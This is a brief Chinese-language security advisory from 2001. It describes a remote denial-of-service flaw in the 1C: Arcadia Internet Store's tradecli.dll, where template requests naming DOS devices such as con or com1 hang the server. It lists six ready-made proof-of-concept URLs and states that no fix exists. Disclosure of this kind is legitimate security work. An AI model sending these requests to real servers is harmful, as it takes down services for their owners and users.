1C: Arcadia Internet store存在拒绝服务攻击发布时间:2001-06-28 更新时间:2001-06-28 严重程度:中 威胁程度:远程拒绝服务 错误类型:设计错误 利用方式:服务器模式 受影响系统 Arcadia 1C: Arcadia Internet Store 1.0详细描述 1C: Arcadia Internet Store是在W2K平台下的在线购物工具,是一个俄罗斯 流行的电子商务工具,其中的'tradecli.dll'允许用户定义模板文件,并把 内容输出,不过远程攻击者通过请求DOS设备如:'con', 'com1', 'com2'等, tradecli.dll尝试打开的时候会造成拒绝服务攻击。 测试代码 http://host/scripts/tradecli.dll?template=com1 http://host/scripts/tradecli.dll?template=com2 http://host/scripts/tradecli.dll?template=com3 http://host/scripts/tradecli.dll?template=con http://host/scripts/tradecli.dll?template=prn http://host/scripts/tradecli.dll?template=aux 解决方案 尚无 相关信息 |
